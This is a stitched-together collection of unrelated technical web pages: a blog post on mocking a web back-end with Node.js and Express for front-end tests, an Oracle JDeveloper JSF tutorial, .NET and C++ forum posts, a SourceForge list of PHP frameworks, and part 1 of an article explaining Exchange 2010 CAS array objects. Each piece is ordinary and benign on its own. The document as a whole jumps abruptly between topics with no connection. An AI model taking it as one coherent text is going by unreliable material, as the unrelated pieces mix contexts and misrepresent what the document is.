Or would you be better off just using a single A record for the CAS array name and letting one of the two servers handle that load until a LB is in place? I really don't want to have all the users profiles have the server names and then have to run a profile repair on each one after the '-rpcclientaccessserver attribute is changed if we move to a CAS array at a later time. Thanks. Hi Brian, Thank you for useful information! Superb Part 1 Brian, cant wait to read Part 2 :) Thank you everyone. @TB, Part-2 will touch on this, but I would consider creating the CAS Array Object with a friendly FQDN name (e.g. 'outlook.domain.com') , create an A record with a low TTL value (5 mins maybe), set RpcClientAccessServer to point to that FQDN on all DBs, and temporarily point that DNS record to one server for now. It'll mean manual failover for now by changing the DNS record (why we want the low TTL), or if both servers are on the same subnet you may be able to get away with adding an IP to one box, point the A record at that IP, and then move the IP between servers when you have to. If you never plan on implementing a DAG (which you should! :) ) then Windows NLB could be stop-gap option, but we generally recommend a Hardware Load Balancer for all customers. You can usually find me in the Exchange 2010 TechNet forums if you have more detailed questions, but some more coming in Part-2.... That was a great info for me & added to my knowledge, clarified few things. Looking forward on your next part too :) @Brian.... thanks for the confirmation. I'll stick with a single A record for now until we can move to a DAG. One more follow up question: If we change the -rpcclientaccessserver attribute on existing databases once we bring up the CAS array, shouldn't the existing clients continue to work if they still point to a previous multi-role server that still exists (and resolves to the server IP). 
I know a profile re-creation would update them to show the new CAS array name in the profile but I don't want to have to do that for 700+ users in a particular office. Thanks. @TB: Outlook autodicover service will be picking up the new CAS Array name for the OL clients. @Imrul, this actually isn't the case and Part-2 discusses how AutoD doesn't update the server name in the profile. @TB, yes the clients will continue to connect to whatever server their profile was originally setup with. @brian: Corrent me if i am wrong, its kinda bug in Outlook that it does not update the server name. In a cross-site failure when the whole site is down, mailbox become active in DR site thanks to DAG. We have to make sure in DNS CAS in Site A must be made to resolve to an IP of CAS in DR site and we dont have to modify the RPCClientAccess Property of the databases right ? @Brian: We deployed a CAS Array for a customer and later configured the pre-existing DB's rpccclientaccessserver attribute to point to the CAS Array. We found that autodiscover picked up the CAS Array name in the user's OL profile. There was no need for profile repair/ profile recreation. Yes, there are still some users whose OL was not updated with the new CAS Name and we had to do the profile repair / profile recreation for those small number of users. So far my understanding and experience, autodiscover is responsible for updating OL with the new cas array name. Please correct me, if I misunderstood anything. Thanks. Hi Brian, Your recommendation to TB re: a DAG - is that so that they can take advantage of the cluster to add an ip resource that can be used for failover (rather than load balancing) for smaller 2-node DAGs that only require HA but don't have the need for LB? @Wes, it was just a way to get a relatively quick switchover instead of waiting for DNS updates to propagate but adding a 2nd IP to the NIC (not cluster). 
WNLB could be used, but if you then wanted to DAG enable the two machines then you'd have to remove WNLB and go with a Hardware LB. @Praveen & Imrul, wait for Part-2 then re-ask. :) @brian: no problem. Will be waiting for part 2. Thanks. Regarding #3, if you would like to integrate Lync into OWA, you will need the FQDN of the Client Access server or CAS Array FQDN as the subject line of the SSL certificate. This ending up biting me when I was integrating Lync into OWA. Excellent Article. Waiting for the part 2 @Ryan, Lync does not use the CAS Array Object as it is not using MAPI to integrate with OWA. When setting up the trusted application in Lync you would be using the "Multiple Computer Pool" option and then give Lync a load balanced name (such as owa.contoso.com) also included in the SSL cert, but not the CAS Array Object name (such as outlook.contoso.com). Items #2 and #3 come into play here as the CAS Array Object is not used for EWS and it does not need to be on the SSL certificate as long as you properly gave it a name different from all of your other load balanced services like OWA, EWS, AutoD, OAB, etc... Great article Brian! Just wanted to mention, lot of customers don't actually utilize different namespaces for RPC vs HTTP traffic hence resulting design uses same name that is used by CAS Array FQDN. This is where the name will need to be in certificate. @Bhargav, quite right you are my friend which is why Item 4 in Part-2 will discuss this common misconfiguration. :) When is Part 2 due Brian..? We're interested in the issues with having a common namespace for the array as well as the client access URLs for OWA, IMAP etc. Thanks! You touched every aspect I could imagine for your 1-3 items. Air five! Great article; but can you guys please enable a "printer friendly' button for those of us that would like to print this for reference materials? right now we have to cut and paste into Word and reformat to make legible!!!!!!! 
Thanks This was a great article - thank you. I wish, however, this had been around before, as it would have saved me adding the CAS Array name to our SSL cert. :-s Nice to know for the future, though. Again, thank you as this was very informative We may need to fix Chapter 5, Lesson 2, pg. 196-197 of the MCTS Self-Paced Training Kit Configuring Microsoft Exchange Server 2010, which says: "A client access array is a collection of load balanced Client Access servers" "A client access array is a load-balanced collection of Client Access servers that are all members of the same site"
https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Demystifying-the-CAS-Array-Object-Part-1/ba-p/600959
My walk code will not skip reading the worksheets inside Excel files. Staff have Excel files with a huge number of worksheets, which is slowing my walk down so much that it is basically unusable. I think it is still reading the Excel worksheets in the else statement.

import arcpy, os, traceback, sys

arcpy.env.overwriteOutput = True
workspace = r"C:\Users\Documents\GisData"
arcpy.env.workspace = workspace

try:
    walk = arcpy.da.Walk(workspace)
    txt = open(r"C:\Users\Documents\StaffGISLibrary.txt", 'w')
    for dirpath, dirnames, filenames in walk:
        if arcpy.Exists(dirpath):
            #describe = arcpy.Describe(dirpath)
            if dirpath.endswith(('.xls', '.xlsx', '.txt')):
                print "skipping excel file"
            else:
                for filename in filenames:
                    fullpath = os.path.join(dirpath, filename)
                    describe = arcpy.Describe(fullpath)
                    print "writing " + fullpath
                    txt.write(fullpath + "," + filename + "," + describe.dataType + "\n")
        else:
            print "DOES NOT EXIST"
    del filename, dirpath, dirnames, filenames
    txt.close()
except Exception, e:
    # If an error occurred, print line number and error message
    import traceback, sys
    tb = sys.exc_info()[2]
    print "Line %i" % tb.tb_lineno
    print e.message
finally:
    raw_input("Finished!")

Sorry for wasting everyone's time. It was just slow and I assumed it was stalling. I guess I need to be more patient.
https://community.esri.com/thread/178568-arcpydawalk-to-not-read-excel-worksheets
When I started building objects in Web IDE for HANA on the XS Advanced server, I ran into quite a few errors during the build or deployment of objects in HANA. I found answers to those errors in the SAP Community forums, and that was very helpful. I then thought of consolidating those common errors and their resolutions in one place in this technical document. Error #1: Building any object in the MTA project fails with the error "No Space is defined for the project". Root Cause and Fix: MTA project developments need a space to store the objects in the database, so one of your organization's XS Advanced spaces must be assigned to the MTA project. This can be done from the project settings menu: select the required space from the available list. Note: Do not select the SAP space, because it is used for standard XS applications and services. Choose one created by you, for example "Dev". Error #2: When I try to assign a space to a project, I get the error "Could not retrieve a list of spaces", as shown in the below picture. Root Cause and Fix: This is because user SSURAMPALLY is not added as a member in that space. Go to the XS Advanced cockpit, select the space, then add members and provide the user name SSURAMPALLY. Error #3: When I try to build a database module object, the process fails with the error "Object has to be prefixed with name space". In this example, I create a column table "Employee" as an .hdbtable object in a DB module; when I try to build it, it fails with the error shown in the picture. Root Cause and Fix: The build failed due to the configuration in the .hdinamespace file; it has a name made up of the project and DB module names, so any design-time object must be prefixed with this name. Usually a namespace is required to uniquely identify an object when multiple objects with the same name could exist in different folders or modules. Fix 1: Prefix the column table name with the namespace, as shown in the below picture.
Fix2: You can also delete the name space file completely, if you feel that there is no possibility of having duplicate names in the project, in this case no name space prefix required and the build will not fail. I usually prefer this option, delete the .hdinamespace file when I start working on a MTA project. Fix3: update the .hdinamespace file, update the subfolder with “ignore” instead of “append”., name parameter with empty string. Error #4: When trying to build a DB module object, failed with an error “Data version only supports build plug in Version 2.0.xx or lower”, as shown in the below picture. Root Cause and fix: While Creating the DB module, database version is chosen as HANA 2.0 SP 4, however my current DB version is HANA 2.0 SP 3, So build failed with an error due to build plug in support. The plug in version can be seen in .hdiconfig file as shown in the below picture. Fix: update the plug in version with 2.0.33 or lower, so that it does not get any compatibility issue. XSA is backward compatible, so you can go as lower as 1.0.11 also. Error #5: When I am trying to build a calculation view, failed with an error, “the file requires xxxx which is not provided by any file. In this case, I am creating a simple calculation view using 2 DB tables, EMPLOYEE and EMPLOYEE_SALARY. EMPLOYEE table is created as design time object, in Database DB module, EMPLOYEE_SALARY table is created directly in the DB explorer as run time object using SQL console. Therefore, build of the calculation view failed with the error shown in below picture. Root Cause and Fix: EMPLOYEE_SALARY table exists as DB table in the system, but it is not part of design time object of the MTA project and DB module. So that, build of calculation view is happening in design time and it requires the EMPLOYEE_SALARY table definition as the design time object. So Create the EMPLOYEE_SALARY table as .hdbtable in Database module of MTA, then try to build the CV, it should be successful. 
Error #6: When I try to build the .hdbgrants file in a DB module which has custom user provided service to connect to Classic Schema, failed with error ‘Service not found’ as shown in below picture. Root cause and Fix: Custom user provided service to access external objects has been created with name cross-schema-service, it has SERVICE_REPLACEMENTS configuration in mta.yaml file to get the service name dynamically based on environment. So I will have to use either the hardcoded service name or key in the SERVICE_REPLACEMENTS as highlighted in the above picture. Error #7: Mixing up the Tenants for Object creation and Custom user provided service creation. When I try to build the db module failed with error in .hdbgrants file about Invalid user name #OO and error in .hdbgrants file as shown in below picture. Root cause and Fix: Database module objects are mapped to a space and then further they are getting deployed to one of the tenants, sometimes, if you properly did not configure in tenant and space mapping correctly, it goes to SYSTEM DB. On the other side, Customer provided service is created on HXE tenant DB, as an external connection established. So with that, when you trying to access HXE tenant objects for the objects in SYSTEM DB, .hddbgrants can’t be successful. So we will make to sure to use correct tenant for CUPS and the current db module developments. Note: if you have more tenants, make sure you give the right PORT number to connect to that tenant. Error #8: Build of the DB module failed with error, unable to grant the access on DB role to #OO user or Calculation view can’t display data out. In this case, I have shown a calculation view which has synonym that is created on a target table which is available in Classic database., there is a DB role which provides the access to that target table, the service creation user (SSURAMPALLY) has already got the access to that schema. 
When the data display on the calculation view gives an error message as shown below. Or you could notice that, build failed with unable to grant access on role to #OO users. Root Cause and Fix: The DB access role created in classic Database is not enabled to have Grantable to others, so with that schema access on classic DB did not get passed to Container object owner #OO. So you must select the Grantable to other users option as shown in below picture. Error #9: Accessing a DB table of HDI container in Classic Database failed with authorization error. Root Cause and Fix: By default, HDI container objects are isolated and can’t be directly accessed in classic database. In order to provide the access, following procedure must be run in Admin console of HDI container in DB Explorer. Error #10: Building a MTA project, giving the message that .mtar file has been generated instead of build completed successfully. Root Cause: Selecting the MTA project and Choose Build is not a regular activation of objects in different modules of MTA. It makes an .mtar file generation which is for cleaner deployment. In other case, when individuals modules build is a private build and only specific to developer container. So make sure, you have built all the modules in MTA before you generate Archive file. This archive file can be used by other developers and make further changes to continue development. Summary: In this document, I covered the basic errors when you started with Web IDE for HANA developments, also covered some of the access related errors to understand. In the next document, I will cover few deployment related errors and fix. Thank you. if you have any comments, please share, I will update the content accordingly. Hi Sreekanth, Thanks for sharing useful docuement, I am facing Error #2, Will perform the steps which you suggested. Useful Information, your blog is sharing unique information…. Thanks for sharing!!! Highly appreciated your efforts, Awesome document. 
Can you also tell me, Even though i im the first owner of a schema my XSA is creating the schema with SCHEMA_1. Default what i know is if you create any schema in the system with XSA it will create your artifacts with the same schema and if other developer build the same module it works as schema_1. Does it looks like a bug? Hi Ahmed, it is not a bug. In the latest releases of Web IDE for HANA MTA template,SAP made that in a way it starts with schema name to look better to first developer, then the next developer will get schema_name_1 and so on. In other releases, first developer starts getting schema_name_1. But what ever the release you get, you can always control this behavior with parameter “make unique name”
https://blogs.sap.com/2020/01/25/common-errors-and-fix-xsa-web-ide-for-hana-developments/
Back to index #include <setjmp.h> Go to the source code of this file. Definition at line 55 of file __longjmp.c. Definition at line 61 of file __longjmp.c. { register long int *fp asm("fp"); long int *regsave; unsigned long int flags; if (env.__fp == NULL) __libc_fatal("longjmp: Invalid ENV argument.\n"); if (val == 0) val = 1; asm volatile("loop:"); flags = *(long int *) (6 + (char *) fp); regsave = (long int *) (20 + (char *) fp); if (flags & 1) /* R0 was saved by the caller. Store VAL where it will be restored from. */ *regsave++ = val; if (flags & 2) /* R1 was saved by the caller. Store ENV where it will be restored from. */ *regsave = env; /* Was the FP saved in the last call the same one in ENV? */ asm volatile("cmpl %0, 12(fp);" /* Yes, return to it. */ "beql done;" /* The FP in ENV is less than the one saved in the last call. This means we have already returned from the function that called `setjmp' with ENV! */ "blssu latejump;" : /* No outputs. */ : "g" (env.__fp)); /* We are more than one level below the state in ENV. Return to where we will pop another stack frame. */ asm volatile("movl $loop, 16(fp);" "ret"); asm volatile("done:"); { char return_insn asm("*16(fp)"); if (return_insn == REI) /* We're returning with an `rei' instruction. Do a return with PSL-PC pop. */ asm volatile("movab 0f, 16(fp)"); else /* Do a standard return. */ asm volatile("movab 1f, 16(fp)"); /* Return. */ asm volatile("ret"); } asm volatile("0:" /* `rei' return. */ /* Compensate for PSL-PC push. */ "addl2 %0, sp;" "1:" /* Standard return. */ /* Return to saved PC. */ "jmp %1" : /* No outputs. */ : "g" (8), "g" (env.__pc)); /* Jump here when the FP saved in ENV points to a function that has already returned. */ asm volatile("latejump:"); __libc_fatal("longjmp: Attempt to jump to a function that has returned.\n"); }
https://sourcecodebrowser.com/glibc/2.9/ports_2sysdeps_2vax_2____longjmp_8c.html
These special variable types automatically increase as time elapses. It's easy to check if a certain time has elapsed, while your program performs other work or checks for user input. It is also very easy to handle multiple tasks requiring different delays.

#include <elapsedMillis.h>

elapsedMillis timeElapsed; // declare global if you don't want it reset every time loop runs

// Pin 13 has an LED connected on most Arduino boards.
int led = 13;

// delay in milliseconds between blinks of the LED
unsigned int interval = 1000;

// state of the LED = LOW is off, HIGH is on
boolean ledState = LOW;

void setup()
{
  // initialize the digital pin as an output.
  pinMode(led, OUTPUT);
}

void loop()
{
  if (timeElapsed > interval)
  {
    ledState = !ledState;         // toggle the state from HIGH to LOW to HIGH to LOW ...
    digitalWrite(led, ledState);
    timeElapsed = 0;              // reset the counter to 0 so the counting starts over...
  }
}

The latest version of the source code is always available for download here (this is a zip file containing the current version of the code). Just download the file, and unpack the contents to your Sketchbook\Libraries folder in a folder named 'elapsedMillis'. (For more information, have a look at the Arduino Guide to Installing Libraries). For users familiar with Git, you can simply clone the git repository into 'elapsedMillis' under your Sketchbook\libraries folder. As this is not an official Arduino library nor is it supported by the Arduino team, please direct all feedback, bugs and issues to the issue tracker for this library, which is located on Github. Although it is thought that this library is already well documented and is accompanied by two example sketches (at the time of writing), more information and examples are located on the wiki. Original source code was written by Paul Stoffregen as an aid to users of his Teensy Arduino compatible USB development board. Visit the Teensy USB Development Board page for more information.
Initial examples and Arduino library package was developed by John Plocher.
https://playground.arduino.cc/Code/ElapsedMillis
CC-MAIN-2018-39
refinedweb
329
60.75
import user's contacts... Budget $300-1500 USD Need someone to create a PHP script that can import a user's contacts from the following sites: Hotmail(com/de), Aol Mail,[url removed, login to view],[url removed, login to view] Gmail, Yahoo Mail(com/de), Hi5, Friendster, FaceBook, MySpace, & Orkut. The script must just get the friends' names and email addresses. It must be compatible with PHP 5 and the entire script should be Object Oriented. Also, the script must be well documented and optimized for fast performance. 13 freelancers bid on average $576 for this job Hello, I already have such a program. Please refer to your PMB for a demo. Thank you. Hi, we have ready, running scripts for Yahoo, Gmail, Hotmail, and we'll build the rest for you. Please check the PMB for a demo... Looking forward to accepting this project. Regards Xaprio Solutions. Hi, I am interested in your work. Please check PMB. Thanks. SybexIndia We already have the same script to extract addresses from Yahoo, MSN, Outlook, Gmail etc... Easy work. I can create this script for you within 3-5 days. I can start work immediately. I have developed similar scripts in the past and I can ensure that you get your money's worth.
https://www.dk.freelancer.com/projects/php/import-user-contacts/
I'm using the famous code referenced here or here to do a daemon in Python, like this:

import sys, daemon

class test(daemon.Daemon):
    def run(self):
        self.db = somedb.connect()  # connect to a DB
        self.blah = 127
        with open('blah0.txt', 'w') as f:
            f.write(self.blah)
        # doing lots of things here, modifying self.blah

    def before_stop(self):
        self.db.close()  # properly close the DB (sync to disk, etc.)
        with open('blah1.txt', 'w') as f:
            f.write(self.blah)

daemon = test(pidfile='_.pid')
if 'start' == sys.argv[1]:
    daemon.start()
elif 'stop' == sys.argv[1]:
    daemon.before_stop()  # AttributeError: test instance has no attribute 'blah'
    daemon.stop()

When I run ./myscript.py stop, the call to daemon.before_stop() fails with AttributeError: test instance has no attribute 'blah', because the stopping process is a fresh instance that never ran run().

The Daemon code sends a SIGTERM signal to the daemon process to ask it to stop. If you want something to be run by the daemon process itself, it must be run from a signal handler or from an atexit-registered method. The daemonize method already installs such a method, so just call before_stop from there:

# this one could be either in a subclass or in a modified base daemon class
def delpid(self):
    if hasattr(self, 'before_stop'):
        self.before_stop()
    os.remove(self.pidfile)

# this one should be in the subclass
def before_stop(self):
    self.db.close()  # properly close the DB (sync to disk, etc.)
    with open('blah1.txt', 'w') as f:
        f.write(self.blah)

But that is not enough! The Python Standard Library documentation says about atexit: "The functions registered via this module are not called when the program is killed by a signal not handled by Python." As the process is expected to receive a SIGTERM signal, you have to install a handler. As shown in one ActiveState recipe, it is damned simple: just ask the program to stop if it receives the signal:

...
from signal import signal, SIGTERM
...
atexit.register(self.delpid)
signal(SIGTERM, lambda signum, stack_frame: exit(1))
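The interplay described above — atexit hooks only fire for signals Python actually handles — is easy to demonstrate end to end. This sketch (independent of any daemon library; `run_demo` and the file names are illustrative) spawns a child process, sends it SIGTERM, and checks that the atexit cleanup ran, which only happens because the handler converts the signal into a normal interpreter exit:

```python
import os
import signal
import subprocess
import sys
import tempfile
import textwrap
import time

# Source of the child process: atexit alone would NOT run on an unhandled
# SIGTERM; the signal handler below turns SIGTERM into sys.exit(), which
# lets the interpreter shut down normally and fire atexit callbacks.
CHILD_SRC = textwrap.dedent("""
    import atexit, signal, sys, time
    marker = sys.argv[1]
    atexit.register(lambda: open(marker, 'w').write('cleaned up'))
    signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
    while True:
        time.sleep(0.05)
""")

def run_demo():
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, 'child.py')
    marker = os.path.join(tmp, 'marker.txt')
    with open(script, 'w') as f:
        f.write(CHILD_SRC)
    proc = subprocess.Popen([sys.executable, script, marker])
    time.sleep(1.0)                      # let the child install its handler
    proc.send_signal(signal.SIGTERM)
    proc.wait()
    with open(marker) as f:
        return f.read()
```

Commenting out the signal.signal line in the child makes the marker file disappear, which is exactly the atexit caveat quoted from the documentation.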
https://codedump.io/share/w9BeqJBi0faC/1/running-code-when-closing-a-python-daemon
Hi all, After checking the forums I managed to set up an Xbox controller for presentations; the only thing I don't understand is the d-pad. How does it work? I wanted to use it as simple buttons and not axes. Is that possible? I see that the Mac driver treats the d-pad as buttons; is that the case for PC too? Thanks. Here are the mappings. EDIT: I think I have to make a script that takes the axis values (-1 to 1) and transforms them into boolean buttons. Is the d-pad the 7th and 6th axis?

My answer isn't formatted well, don't know why it's doing that.

The D-pad uses buttons 2, 3, 4, 5.

I think the PC driver doesn't recognise the d-pad as buttons but as axes, unless I am missing something really obvious in the Input Manager. But thanks anyway.

Answer by gglobensky · Oct 10, 2018 at 07:13 AM

bool isRight = (Input.GetAxis ("DPadX") < -0.1f) ? true : false;
bool isLeft = (Input.GetAxis ("DPadX") > 0.1f) ? true : false;
bool isDown = (Input.GetAxis ("DPadY") < -0.1f) ? true : false;
bool isUp = (Input.GetAxis ("DPadY") > 0.1f) ? true : false;

Answer by stonstad · Nov 30, 2018 at 03:19 AM

Fun. So the examples above do not compile or they are unfortunately wrong. This is an old thread ... but if you are wanting to treat DPad input as a non-repeating button (e.g. Input.GetButtonDown), here's an approach that is simple and likely the fewest number of operations possible. Make sure to attach this script to a game object.

using UnityEngine;

public class DPadButtons : MonoBehaviour
{
    public static bool IsLeft, IsRight, IsUp, IsDown;
    private float _LastX, _LastY;

    private void Update()
    {
        float x = Input.GetAxis("DPad X");
        float y = Input.GetAxis("DPad Y");

        IsLeft = false;
        IsRight = false;
        IsUp = false;
        IsDown = false;

        if (_LastX != x)
        {
            if (x == -1) IsLeft = true;
            else if (x == 1) IsRight = true;
        }

        if (_LastY != y)
        {
            if (y == -1) IsDown = true;
            else if (y == 1) IsUp = true;
        }

        _LastX = x;
        _LastY = y;
    }
}

Invocation:

if (DPadButtons.IsLeft) ...
// executes once and only once per button press

Answer by Ares · Aug 12, 2010 at 12:25 PM

Yeah, the D-pad works.
Button 0 - nothing
Button 1 - nothing
Button 2 - DPad Up
Button 3 - DPad Down
Button 4 - DPad Left
Button 5 - DPad Right
Button 6 - Start
Button 7 - Back
Button 8 - Left Analog Stick Press
Button 9 - Right Analog Stick Press
Button 10 - Left Shoulder Button
Button 11 - Right Shoulder Button
Button 12 - XBox Button
Button 13 - A
Button 14 - B
Button 15 - X
Button 16 - Y
Button 17 - nothing
Button 18 - nothing
Button 19 - nothing
Analog Stick Axes: same as drJones
5th Axis - Left Trigger
6th Axis - Right Trigger
I got this from here: It's possible to have more than one controller running at a time, I don't have that info on me right now. Thanks, Ares

::edit:: I don't know why the formatting is jacked up. alexnode pointed out I listed the layout for a Mac. PC treats the D-pad differently.
D-pad Up : +ve 7th Axis
D-pad Down : -ve 7th Axis
D-pad Left : -ve 6th Axis
D-pad Right : +ve 6th Axis
(copied from)

No, this is for the Mac configuration, with the custom drivers. For PC it is different.

Yeah, I just saw that. I'm editing my answer.

Thanks a lot Ares, but I still don't understand how to map them as buttons. What does +ve mean?

+ve -> positive, -ve -> negative :)

Answer by mptp · Oct 16, 2014 at 05:15 AM

Since I just found this page trying to do it myself, and nobody had an answer, I thought I'd post what I just came up with to achieve the result the OP was asking about (that is, using the DPad buttons as buttons rather than axes). You need to do it yourself, unfortunately. Luckily, it's not too hard.
Something like this works fine:

using UnityEngine;
using System.Collections;

public class DPadButtons : MonoBehaviour
{
    public static bool up;
    public static bool down;
    public static bool left;
    public static bool right;

    float lastX;
    float lastY;

    void Start()
    {
        up = down = left = right = false;
        lastX = Input.GetAxis("DPadX");
        lastY = Input.GetAxis("DPadY");
    }

    void Update()
    {
        float x = Input.GetAxis("DPadX");
        float y = Input.GetAxis("DPadY");

        // true only on the frame the axis first reaches its extreme
        right = (x == 1 && lastX != 1);
        left = (x == -1 && lastX != -1);
        up = (y == 1 && lastY != 1);
        down = (y == -1 && lastY != -1);

        lastX = x;
        lastY = y;
    }
}

Then, in any script, you can do something like

if (DPadButtons.up)
{
    // some code to execute when the up button is pushed
}

I'm sure you could extend Unity's Input class, but I don't know how to do that, and this works fine for me right now.

Thanks!! But I got some errors while compiling. I would like to put what worked for me using your work.

Answer by MechanicalBox · Jan 21, 2015 at 01:57 AM

using UnityEngine;
using System.Collections;

/// <summary> This class maps the DPad axis to buttons.
/// </summary>
public class DPadButtons : MonoBehaviour
{
    public static bool up;
    public static bool down;
    public static bool left;
    public static bool right;

    private float lastX, lastY;

    void Start()
    {
        up = down = left = right = false;
        lastX = lastY = 0;
    }

    void Update()
    {
        float lastDpadX = lastX;
        float lastDpadY = lastY;

        // Helpers and AxisName are user-defined elsewhere (see the question below)
        if (Helpers.IsAxisActive(AxisName.DPad_Horizontal))
        {
            float DPadX = Input.GetAxis(AxisName.DPad_Horizontal);
            if (DPadX == 1 && lastDpadX != 1) { right = true; } else { right = false; }
            if (DPadX == -1 && lastDpadX != -1) { left = true; } else { left = false; }
            lastX = DPadX;
        }
        else
        {
            lastX = 0;
        }

        if (Helpers.IsAxisActive(AxisName.DPad_Vertical))
        {
            float DPadY = Input.GetAxis(AxisName.DPad_Vertical);
            if (DPadY == 1 && lastDpadY != 1) { up = true; } else { up = false; }
            if (DPadY == -1 && lastDpadY != -1) { down = true; } else { down = false; }
            lastY = DPadY;
        }
        else
        {
            lastY = 0;
        }
    }
}

Where are "Helpers" and "AxisName" declared in the above?
.\" formatting Sat Jul 24 17:13:38 1993, Rik Faith (faith@cs.unc.edu)
.\" Modified (extensions and corrections) Sun May 1 14:21:25 MET DST 1994 Michael Haardt
.\" If mistakes in the capabilities are found, please send a bug report to:
.\" michael@moria.de
.\" Modified Mon Oct 21 17:47:19 EDT 1996 by Eric S. Raymond (esr@thyrsus.com)
.TH TERMCAP 5 "" "Linux" "Linux Programmer's Manual"
.SH NAME
termcap \- terminal capability database
.SH DESCRIPTION
The termcap database is an obsolete facility for describing the capabilities
of character-cell terminals and printers.
It is retained only for compatibility with old programs; new ones should use the
.BR terminfo (5)
database and associated libraries.
.LP
The termcap database is indexed on the TERM environment variable.
.LP
Termcap entries must be defined on a single logical line, with `\\' used to
suppress the newline.
Fields are separated by `:'.
The first field of each entry starts at the left-hand margin, and contains a
list of names for the terminal, separated by '|'.
.LP
The first subfield may (in BSD termcap entries from versions 4.3 and prior)
contain a short name consisting of two characters.
This short name may consist of capital or small letters.
In 4.4BSD termcap entries this field is omitted.
.LP
Subsequent fields contain the terminal capabilities; any continued capability
lines must be indented one tab from the left margin.
.LP
Although there is no defined order, it is suggested to write first boolean,
then numeric, and then string capabilities, each sorted alphabetically
without looking at lower or upper spelling.
Capabilities of similar functions can be written in one line.
.LP
.nf
Example for:
.sp
Head line: vt|vt101|DEC VT 101 terminal in 80 character mode:\e
Head line: Vt|vt101-w|DEC VT 101 terminal in (wide) 132 character mode:\e
Boolean: :bs:\e
Numeric: :co#80:\e
String: :sr=\eE[H:\e
.fi
.SS "Boolean Capabilities"
.nf
.fi
.SS "Numeric Capabilities"
.nf
.fi
.SS "String Capabilities"
.nf
.fi
.LP
There are several ways of defining the control codes for string capabilities:
.LP
Normal characters except '^', '\e' and '%' represent themselves.
.LP
A '^x' means Control-x. Control-A equals 1 decimal.
.LP
\ex means a special code. x can be one of the following characters:
.RS
E Escape (27)
.br
n Linefeed (10)
.br
r Carriage return (13)
.br
t Tabulation (9)
.br
b Backspace (8)
.br
f Form feed (12)
.br
0 Null character. A \exxx specifies the octal character xxx.
.RE
.IP i
Increments parameters by one.
.IP r
Single parameter capability
.IP +
Add value of next character to this parameter and do binary output
.IP 2
Do ASCII output of this parameter with a field width of 2
.IP d
Do ASCII output of this parameter with a field width of 3
.IP %
Print a '%'
.LP
If you use binary output, then you should avoid the null character because it
terminates the string.
You should reset tabulator expansion if a tabulator can be the binary output
of a parameter.
.IP Warning:
The above metacharacters for parameters may be wrong, they document Minix
termcap which may not be compatible with Linux termcap.
.LP
The block graphic characters can be specified by three string capabilities:
.IP as
start the alternative charset
.IP ae
end it
.IP ac
pairs of characters. The first character is the name of the block graphic
symbol and the second character is its definition.
.LP
The following names are available:
.sp
.nf
+ (???)
.fi
.sp
The values in parentheses are suggested defaults which are used by curses,
if the capabilities are missing.
.SH "SEE ALSO"
.BR curses (3),
.BR termcap (3),
.BR terminfo (5)
We have tried to keep the API of Qt 3.0 as compatible as possible with the Qt 2.x series. For most applications only minor changes will be needed to compile and run them successfully using Qt 3.0. One of the major new features that has been added in the 3.0 release is a module allowing you to easily work with databases. The API is platform independent and database neutral. This module is seamlessly integrated into Qt Designer, greatly simplifying the process of building database applications and using data-aware widgets. Another major new feature is the plugin architecture: you can use your own and third-party plugins in your own applications. The Unicode support of Qt 2.x has been greatly enhanced; it now includes full support for scripts written from right to left (e.g. Arabic and Hebrew) and also provides improved support for Asian languages. Many new classes have been added to the Qt library. Amongst them are classes that provide a docking architecture (QDockArea/QDockWindow), a powerful rich text editor (QTextEdit), a class to store and access application settings (QSettings) and a class to create and communicate with processes (QProcess). Apart from the changes in the library itself, a lot has been done to make the development of Qt applications with Qt 3.0 even easier than before. Two new applications have been added: Qt Linguist is a tool to help you translate your application into different languages; Qt Assistant is an easy-to-use help browser for the Qt documentation that supports bookmarks and can search by keyword. Another change concerns the Qt build system, which has been reworked to make it a lot easier to port Qt to new platforms. You can use this platform-independent build system for your own applications. A large number of new features has been added to Qt 3.0. The following list gives an overview of the most important new and changed aspects of the Qt library. A full list of every new method follows the overview.
One of the major new features in Qt 3.0 is the SQL module that provides multiplatform access to SQL databases, making database application programming with Qt seamless and portable. The API, built with standard SQL, is database-neutral, and software development is independent of the underlying database. A collection of tightly focused C++ classes is provided to give the programmer direct access to SQL databases. Developers can send raw SQL to the database server or have the Qt SQL classes generate SQL queries automatically. Drivers for Oracle, PostgreSQL, MySQL and ODBC are available, and writing new drivers is straightforward. Tying the results of SQL queries to GUI components is fully supported by Qt's SQL widgets. These classes include a tabular data widget (for spreadsheet-like data presentation with in-place editing), a form-based data browser (which provides data navigation and edit functions) and a form-based data viewer (which provides read-only forms). This framework can be extended by using custom field editors, allowing, for example, a data table to use custom widgets for in-place editing. The SQL module fully supports Qt's signal/slot mechanism, making it easy for developers to include their own data validation and auditing code. Qt Designer fully supports Qt's SQL module. All SQL widgets can be laid out within Qt Designer, and relationships can be established between controls visually. Many interactions can be defined purely in terms of Qt's signals/slots mechanism directly in Qt Designer. The QLibrary class provides a platform-independent wrapper for runtime loading of shared libraries. QPluginManager makes it trivial to implement plugin support in applications. The Qt library is able to load additional styles, database drivers and text codecs from plugins. Qt Designer supports custom widgets in plugins, and will use the widgets both when designing and previewing forms. See the plugins documentation.
The rich text engine originally introduced in Qt 2.0 has been further optimized and extended to support editing. It allows editing formatted text with different fonts, colors, paragraph styles, tables and images. The editor supports different word wrap modes, command-based undo/redo, multiple selections, drag and drop, and many other features. The new QTextEdit engine is highly optimized for processing and displaying large documents quickly and efficiently. Apart from the rich text engine, another new feature of Qt 3.0 that relates to text handling is the greatly improved Unicode support. Qt 3.0 includes an implementation of the bidirectional algorithm (BiDi) as defined in the Unicode standard and a shaping engine for Arabic, which gives full native language support to Arabic and Hebrew speaking people. At the same time the support for Asian languages has been greatly enhanced. The support is almost transparent for the developer using Qt to develop their applications. This means that developers who developed applications using Qt 2.x will automatically gain the full support for these languages when switching to Qt 3.0. Developers can rely on their application to work for people using writing systems different from Latin1, without having to worry about the complexities involved with these scripts, as Qt takes care of this automatically. Qt 3.0 introduces the concept of dock windows and dock areas. Dock windows are widgets that can be attached to, and detached from, dock areas. The commonest kind of dock window is a tool bar. Any number of dock windows may be placed in a dock area. A main window can have dock areas; for example, QMainWindow provides four dock areas (top, left, bottom, right) by default. The user can freely move dock windows and place them at a convenient place in a dock area, or drag them out of the application and have them float freely as top level windows in their own right. Dock windows can also be minimized or hidden.
